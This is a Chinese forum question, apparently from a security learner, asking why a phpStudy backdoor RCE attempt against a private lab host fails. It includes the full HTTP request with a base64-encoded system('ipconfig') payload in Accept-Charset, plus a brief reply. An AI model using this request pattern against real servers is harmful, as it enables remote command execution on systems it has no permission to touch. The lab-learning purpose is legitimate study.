独孤求败Ace 2023-09-30 11:48 采纳率: 18.2%
浏览 14

网络安全PHP study,burp suite抓包,RCE漏洞

phpstudy执行RCE漏洞不成功:
GET /phpinfo.php HTTP/1.1

Accept-Charset:c3lzdGVtKCJpcGNvbmZpZyIpOw==
Accept-Encoding: gzip,deflate
Connection: close
Referer: http://192.168.120.130/
Upgrade-Insecure-Requests: 1

#encoding去掉了空格
#charset是用base64编码

为什么执行命令后,并没有成功,还是和原来一样,如下:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;
  • 写回答

2条回答 默认 最新

  • 学网安的A 2023-09-30 12:13
    关注

    charset不是指定编码字符集的嘛,你直接base64编码的一段内容写上(我的理解就是这样,不知道对不对)

    评论

报告相同问题?

问题事件

  • 创建了问题 9月30日